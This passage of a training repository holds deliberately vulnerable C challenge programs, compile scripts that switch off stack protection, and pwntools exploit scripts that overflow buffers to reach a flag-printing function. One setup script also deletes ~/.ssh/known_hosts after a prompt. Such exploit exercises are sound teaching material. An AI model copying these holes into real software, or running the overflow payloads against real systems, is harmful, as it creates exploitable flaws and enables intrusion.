message name:"); 20 | fgets(name, BUF_SIZE, stdin); 21 | printf("Enter message content:"); 22 | gets(content); 23 | 24 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch07!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | } 67 | -------------------------------------------------------------------------------- /exercises-i386/ch07/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07 2 | -------------------------------------------------------------------------------- /exercises-i386/ch07/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch08/ch08.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void send(){ 9 | char name[BUF_SIZE] = {0}; 10 | char content[BUF_SIZE] = {0}; 11 | 12 | printf("Creating message\n"); 13 | printf("Enter message name:"); 14 | fgets(name, BUF_SIZE, stdin); 15 | 
printf("Enter message content:"); 16 | gets(content); 17 | 18 | printf("name: \""); 19 | printf(name); 20 | printf("\"\ncontent:\"%s\"\n", content); 21 | } 22 | 23 | int menu(){ 24 | char buffer[BUF_SIZE] = {0}; 25 | 26 | printf("[*] menu\n"); 27 | printf("menu - show this menu\n"); 28 | printf("send - send new message\n"); 29 | printf("exit - close program\n"); 30 | 31 | fgets(buffer, BUF_SIZE, stdin); 32 | 33 | if (strcmp(buffer, "menu\n") == 0){ 34 | return 1; 35 | } 36 | else if (strcmp(buffer, "send\n") == 0){ 37 | send(); 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "exit\n") == 0){ 41 | return 0; 42 | } 43 | else{ 44 | printf("Unknown command: %s", buffer); 45 | return 1; 46 | } 47 | 48 | } 49 | 50 | int main(int argc, char **argv){ 51 | setbuf(stdout, NULL); 52 | uid_t uid = geteuid(); 53 | setresuid(uid,uid,uid); 54 | printf("Welcome to ch08!\n"); 55 | while(1){ 56 | if (!(menu())){ 57 | break; 58 | } 59 | printf("\n"); 60 | } 61 | printf("Exiting...\n"); 62 | } 63 | -------------------------------------------------------------------------------- /exercises-i386/ch08/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch08.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch08 2 | -------------------------------------------------------------------------------- /exercises-i386/ch08/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch09/ch09.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 
19 | void secret(){ 20 | system("cat flag"); 21 | } 22 | 23 | void send(){ 24 | 25 | message* msg = (message*) malloc(sizeof(message)); 26 | important* object_01 = (important*) malloc(sizeof(important)); 27 | 28 | printf("Creating message\n"); 29 | printf("Enter message name:"); 30 | fgets(msg->name, BUF_SIZE, stdin); 31 | printf("Enter message content:"); 32 | gets(msg->content); 33 | 34 | if (object_01->func_ptr){ 35 | object_01->func_ptr(); 36 | } 37 | 38 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 39 | } 40 | 41 | int menu(){ 42 | char buffer[BUF_SIZE] = {0}; 43 | 44 | printf("[*] menu\n"); 45 | printf("menu - show this menu\n"); 46 | printf("send - send new message\n"); 47 | printf("exit - close program\n"); 48 | 49 | fgets(buffer, BUF_SIZE, stdin); 50 | 51 | if (strcmp(buffer, "menu\n") == 0){ 52 | return 1; 53 | } 54 | else if (strcmp(buffer, "send\n") == 0){ 55 | send(); 56 | return 1; 57 | } 58 | else if (strcmp(buffer, "exit\n") == 0){ 59 | return 0; 60 | } 61 | else{ 62 | printf("Unknown command: %s", buffer); 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | int main(int argc, char **argv){ 69 | setbuf(stdout, NULL); 70 | uid_t uid = geteuid(); 71 | setresuid(uid,uid,uid); 72 | printf("Welcome to ch09!\n"); 73 | while(1){ 74 | if (!(menu())){ 75 | break; 76 | } 77 | printf("\n"); 78 | } 79 | printf("Exiting...\n"); 80 | } 81 | -------------------------------------------------------------------------------- /exercises-i386/ch09/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch09.c -static -no-pie -o $1/ch09 2 | -------------------------------------------------------------------------------- /exercises-i386/ch09/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch10/ch10.c: 
-------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | important* work; 20 | 21 | void func(){ 22 | printf("[*] Working\n"); 23 | } 24 | 25 | void secret(){ 26 | system("cat flag"); 27 | } 28 | 29 | void create_worker(){ 30 | work = (important*) malloc(sizeof(important)); 31 | work->func_ptr = func; 32 | printf("Worker Created in %p\n", work); 33 | } 34 | 35 | void start_worker(){ 36 | work->func_ptr(); 37 | } 38 | 39 | void free_worker(){ 40 | free(work); 41 | } 42 | 43 | void send(){ 44 | message* msg = (message*) malloc(sizeof(message)); 45 | printf("Message Created in %p\n", msg); 46 | 47 | printf("Creating message\n"); 48 | printf("Enter message name:"); 49 | fgets(msg->name, BUF_SIZE, stdin); 50 | printf("Enter message content:"); 51 | gets(msg->content); 52 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 53 | } 54 | 55 | int menu(){ 56 | char buffer[BUF_SIZE] = {0}; 57 | 58 | printf("[*] menu\n"); 59 | printf("menu - show this menu\n"); 60 | printf("send - send new message\n"); 61 | printf("create_worker - create worker\n"); 62 | printf("start_worker - run worker\n"); 63 | printf("free_worker - free current worker\n"); 64 | printf("exit - close program\n"); 65 | 66 | fgets(buffer, BUF_SIZE, stdin); 67 | 68 | if (strcmp(buffer, "menu\n") == 0){ 69 | return 1; 70 | } 71 | else if (strcmp(buffer, "create_worker\n") == 0){ 72 | create_worker(); 73 | return 1; 74 | } 75 | else if (strcmp(buffer, "start_worker\n") == 0){ 76 | start_worker(); 77 | return 1; 78 | } 79 | else if (strcmp(buffer, "free_worker\n") == 0){ 80 | free_worker(); 81 | return 1; 82 | } 83 | else if (strcmp(buffer, "send\n") == 
0){ 84 | send(); 85 | return 1; 86 | } 87 | else if (strcmp(buffer, "exit\n") == 0){ 88 | return 0; 89 | } 90 | else{ 91 | printf("Unknown command: %s", buffer); 92 | return 1; 93 | } 94 | 95 | } 96 | 97 | int main(int argc, char **argv){ 98 | setbuf(stdout, NULL); 99 | uid_t uid = geteuid(); 100 | setresuid(uid,uid,uid); 101 | printf("Welcome to ch10!\n"); 102 | while(1){ 103 | if (!(menu())){ 104 | break; 105 | } 106 | printf("\n"); 107 | } 108 | printf("Exiting...\n"); 109 | } 110 | -------------------------------------------------------------------------------- /exercises-i386/ch10/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch10.c -static -no-pie -o $1/ch10 2 | -------------------------------------------------------------------------------- /exercises-i386/ch10/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/motd: -------------------------------------------------------------------------------- 1 | 2 | ZenySec 3 | 4 | 5 | -------------------------------------------------------------------------------- /exercises-i386/welcome/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/welcome.c -no-pie -o $1/welcome 2 | -------------------------------------------------------------------------------- /exercises-i386/welcome/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/welcome/welcome.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char **argv){ 7 | uid_t uid = geteuid(); 8 | setresuid(uid,uid,uid); 9 | system("cat 
flag"); 10 | } 11 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | import argparse 4 | import os 5 | from DockerFile import DockerFile 6 | from ChallengeBuild import ChallengeBuild 7 | 8 | 9 | def main(port, arch, docker_name, aslr, directory=None, no_cache=False, 10 | build_run=False): 11 | if not directory: 12 | directory = os.getcwd() 13 | 14 | with ChallengeBuild(directory=directory, arch=arch, aslr=aslr) as challenge_handle: 15 | if build_run: 16 | if not docker_name: 17 | raise Exception("missing docker name") 18 | with DockerFile(sources=challenge_handle.sources, docker_name=docker_name, no_cache=no_cache, 19 | build_run=build_run, port=port, arch=arch, aslr=aslr) as docker_handle: 20 | print docker_handle.docker_name 21 | interactive = raw_input('execute `rm -f ~/.ssh/known_hosts` y/n?') 22 | if interactive == 'y': 23 | print 'rm -f ~/.ssh/known_hosts' 24 | os.system('rm -f ~/.ssh/known_hosts') 25 | 26 | 27 | if __name__ == '__main__': 28 | parser = argparse.ArgumentParser(description='ZenySec Exploitation Exercises') 29 | parser.add_argument('-dir', '--directory', help='main directory', required=False, dest='directory') 30 | 31 | parser.add_argument('-d', '--docker-name', help='docker name', required=True, dest='docker_name') 32 | parser.add_argument('-ca', '--no-cache', help='use cache when building docker', required=False, dest='no_cache', 33 | action='store_true') 34 | parser.add_argument('-r', '--build-run', help='build and run docker', required=False, dest='build_run', 35 | action='store_true') 36 | parser.add_argument('-p', '--port', help='running docker port', required=True, dest='port') 37 | 38 | parser.add_argument('-a', '--architecture', help='i386/arm32v7', required=True, dest='arch') 39 | 40 | parser.add_argument('-as', '--aslr', help='yes/no', required=True, dest='aslr') 41 | 
main(**vars(parser.parse_args())) 42 | -------------------------------------------------------------------------------- /qemu-arm-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/qemu-arm-static -------------------------------------------------------------------------------- /writeups/arm32v7/ArmExploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | 5 | 6 | class ArmExploit(object): 7 | def __init__(self, challenge_name, execution, debug_port=20000, remote_port=20000): 8 | self.r = None 9 | if execution == 'debug': 10 | r = process(['qemu-arm-static', '-g', '{port}'.format(port=debug_port), './{challenge_name}'.format(challenge_name=challenge_name)]) 11 | log.info('xhelp - help in gdb') 12 | os.system('x-terminal-emulator -e "gdb-multiarch -x ../gdb_plugin.sh {challenge_name}"'.format( 13 | challenge_name=challenge_name)) 14 | elif execution == 'local': 15 | r = process(['qemu-arm-static', './{challenge_name}'.format(challenge_name=challenge_name)]) 16 | elif execution == 'remote': 17 | ssh_client = ssh(user=challenge_name, host='exercises-arm32v7.zenysec.com', port=remote_port, 18 | password=challenge_name) 19 | r = ssh_client.process(['./{challenge_name}'.format(challenge_name=challenge_name)]) 20 | else: 21 | log.error('Unknown execution type {execution}'.format(execution=execution)) 22 | raise Exception('ArmExploit: Unknown execution type {execution}'.format(execution=execution)) 23 | self.r = r 24 | 25 | -------------------------------------------------------------------------------- /writeups/arm32v7/ArmExploit.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ArmExploit.pyc -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch00/ch00 -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/ch00.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char value; 17 | }; 18 | struct locals l = {.value = 0, .content = {0}, .name = {0}}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(l.value == 0x7){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | 
printf("Welcome to ch00!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch00.c -static -no-pie -o $1/ch00 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch00' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(0x7, word_size=32)) 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch00') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch00/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/ch01: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch01/ch01
--------------------------------------------------------------------------------
/writeups/arm32v7/ch01/ch01.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
/*
 * ch01 training exercise: a menu-driven message program. send() reads the
 * message content with gets(), which puts no bound on the input length, and
 * then makes an access decision from a field stored right after that buffer.
 *
 * NOTE(review): the header names after #include were lost when this listing
 * was extracted. The calls used below (printf/fgets/gets, system, strcmp)
 * suggest stdio.h, stdlib.h and string.h - confirm against the repository.
 */
#include
#include
#include

#define BUF_SIZE 50

/* Runs `cat flag` through the shell. The only call site in this file is in
 * send(), guarded by the admin check. */
void secret(){
    system("cat flag");
}

/*
 * Prompts for a message name and content, echoes both, and calls secret()
 * when the admin field compares equal to "true".
 */
void send(){
    /* All three arrays live in one struct, so their order in memory is the
     * declaration order: name, then content, then admin. */
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        char admin[BUF_SIZE];
    };
    struct locals l = {.name = {0}, .content = {0}, .admin = "false"};

    printf("Creating message\n");
    printf("Enter message name:");
    /* Bounded read: at most BUF_SIZE - 1 characters are stored in name. */
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    /* Defect (deliberate in this exercise): gets() has no length argument,
     * so a line longer than content is written on into admin. In production
     * code the equivalent read is fgets(l.content, sizeof l.content, stdin),
     * and authorization state should not sit next to an input buffer.
     * A stack canary would not catch this case, because the overwritten
     * field is inside the same struct as the buffer. */
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
    /* The program itself never writes "true" into admin; it is set to
     * "false" above and only compared here. */
    if(!(strcmp(l.admin, "true"))){
        secret();
    }
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for every other input, including unknown
 * commands.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    /* Bounded read; the trailing newline is kept, which is why the
     * comparisons below include "\n". */
    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        /* User input is passed as an argument to a fixed "%s" format,
         * not used as the format string itself. */
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Entry point: disables stdout buffering, sets the real, effective and saved
 * user IDs to the current effective UID, then runs menu() until it returns 0.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    /* NOTE(review): presumably the binary is installed set-uid so that
     * `cat flag` runs as the flag's owner - confirm against the Docker setup.
     * The return value of setresuid() is not checked. */
    setresuid(uid,uid,uid);
    printf("Welcome to ch01!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

-------------------------------------------------------------------------------- /writeups/arm32v7/ch01/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch01.c -static -no-pie -o $1/ch01 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch01' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(50) + 'true') 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch01') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch01/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/ch02: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch02/ch02
--------------------------------------------------------------------------------
/writeups/arm32v7/ch02/ch02.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
/*
 * ch02 training exercise: a menu-driven message program. send() reads the
 * message content with gets() into a buffer that is followed, in the same
 * struct, by a function pointer which is called when it is non-zero.
 *
 * NOTE(review): the header names after #include were lost when this listing
 * was extracted. The calls used below (printf/fgets/gets, system, strcmp)
 * suggest stdio.h, stdlib.h and string.h - confirm against the repository.
 */
#include
#include
#include

#define BUF_SIZE 50

/* Runs `cat flag` through the shell. Nothing in this file calls it
 * directly. */
void secret(){
    system("cat flag");
}

/*
 * Prompts for a message name and content, echoes both, then calls the hook
 * function pointer if it is non-zero.
 */
void send(){
    /* Members are laid out in declaration order, so hook is stored after
     * content. */
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        void (*hook)();
    };
    struct locals l = {.name = {0}, .content = {0}, .hook = 0};

    printf("Creating message\n");
    printf("Enter message name:");
    /* Bounded read: at most BUF_SIZE - 1 characters are stored in name. */
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    /* Defect (deliberate in this exercise): gets() has no length argument,
     * so a line longer than content is written on past the end of the array,
     * towards hook. In production code the equivalent read is
     * fgets(l.content, sizeof l.content, stdin), and code pointers should
     * not be stored next to buffers that receive external input. */
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);

    /* hook is initialised to 0 and never assigned anywhere in this file, so
     * this indirect call is taken only if the memory holding hook has been
     * changed by something other than the program's own assignments. */
    if(l.hook){
        l.hook();
    }
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for every other input, including unknown
 * commands.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    /* Bounded read; the trailing newline is kept, which is why the
     * comparisons below include "\n". */
    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        /* User input is passed as an argument to a fixed "%s" format,
         * not used as the format string itself. */
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Entry point: disables stdout buffering, sets the real, effective and saved
 * user IDs to the current effective UID, then runs menu() until it returns 0.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    /* NOTE(review): presumably the binary is installed set-uid so that
     * `cat flag` runs as the flag's owner - confirm against the Docker setup.
     * The return value of setresuid() is not checked. */
    setresuid(uid,uid,uid);
    printf("Welcome to ch02!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/arm32v7/ch02/compile.sh:
-------------------------------------------------------------------------------- 1 | gcc $1/ch02.c -static -no-pie -o $1/ch02 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch02' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | print hex(secret_func_addr) 23 | r.recvuntil('exit - close program') 24 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32)) 25 | r.recvuntil('zenysec') 26 | flag = 'zenysec' + r.recvuntil('\n') 27 | log.success('The flag is: {flag}'.format(flag=flag)) 28 | r.close() 29 | 30 | 31 | if __name__ == '__main__': 32 | parser = argparse.ArgumentParser(description='Exploit ch02') 33 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 34 | main(**vars(parser.parse_args())) 35 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch02/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch03/ch03: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch03/ch03
--------------------------------------------------------------------------------
/writeups/arm32v7/ch03/ch03.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
/*
 * ch03 training exercise: a menu-driven message program. send() reads the
 * message content with gets() into a fixed-size stack array. The compile.sh
 * listed for this challenge builds it with -fno-stack-protector and -no-pie.
 *
 * NOTE(review): the header names after #include were lost when this listing
 * was extracted. The calls used below (printf/fgets/gets, system,
 * strcmp/strcpy) suggest stdio.h, stdlib.h and string.h - confirm against
 * the repository.
 */
#include
#include
#include

#define BUF_SIZE 50

/* Shell command run by secret01(). Starts as "whoami"; secret02() replaces
 * it with "cat flag". */
char command_string[BUF_SIZE] = "whoami\x00";

/* Overwrites command_string with "cat flag" and prints a marker line.
 * Nothing in this file calls it. */
void secret02(){
    strcpy(command_string, "cat flag\x00");
    printf("secret02 called!\n");
}

/* Passes the current command_string to the shell and prints a marker line.
 * Nothing in this file calls it. */
void secret01(){
    system(command_string);
    printf("secret01 called!\n");
}

/*
 * Prompts for a message name and content and echoes both.
 */
void send(){
    char name[BUF_SIZE] = {0};
    char content[BUF_SIZE] = {0};

    printf("Creating message\n");
    printf("Enter message name:");
    /* Bounded read: at most BUF_SIZE - 1 characters are stored in name. */
    fgets(name, BUF_SIZE, stdin);
    printf("Enter message content:");
    /* Defect (deliberate in this exercise): gets() has no length argument,
     * so a line longer than content is written on past the end of the array
     * into whatever the compiler placed after it in this stack frame. With
     * the stack protector disabled at build time, nothing checks the frame
     * for corruption when send() returns. In production code the equivalent
     * read is fgets(content, sizeof content, stdin), built with
     * -fstack-protector-strong and as a position-independent executable. */
    gets(content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
}

/*
 * Prints the menu, reads one command line and dispatches it.
 * Returns 0 for "exit" and 1 for every other input, including unknown
 * commands.
 */
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    /* Bounded read; the trailing newline is kept, which is why the
     * comparisons below include "\n". */
    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        /* User input is passed as an argument to a fixed "%s" format,
         * not used as the format string itself. */
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

/*
 * Entry point: disables stdout buffering, sets the real, effective and saved
 * user IDs to the current effective UID, then runs menu() until it returns 0.
 */
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    uid_t uid = geteuid();
    /* NOTE(review): presumably the binary is installed set-uid so that
     * `cat flag` runs as the flag's owner - confirm against the Docker setup.
     * The return value of setresuid() is not checked. */
    setresuid(uid,uid,uid);
    printf("Welcome to ch03!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/arm32v7/ch03/compile.sh:
--------------------------------------------------------------------------------
# -fno-stack-protector removes stack canaries and -no-pie fixes the load
# address; these are exercise settings. $1 is unquoted, so a directory
# argument containing spaces would be split into several words.
gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03
--------------------------------------------------------------------------------
/writeups/arm32v7/ch03/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from ArmExploit import ArmExploit
import argparse


def send(r, msg_name, msg_content):
    """Drive the target's 'send' menu command over the connection r.

    Sends the literal command 'send', waits for the name prompt and answers
    it with msg_name, then waits for the content prompt and answers it with
    msg_content. Nothing is returned.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch03 write-up against the bundled training binary.

    execution is forwarded unchanged to ArmExploit, which is imported from
    ArmExploit.py; the values it accepts are defined there, not here.
    One message is sent whose content is 108 bytes of cyclic() filler, the
    address of secret02 plus 2, four 'a' bytes and the address of secret01,
    each address packed as a 32-bit word. In ch03.c, secret02() copies
    "cat flag" into command_string and secret01() passes command_string to
    system(); the content field is read there with an unbounded gets() into
    a 50-byte stack array, which is the flaw this script depends on.
    """
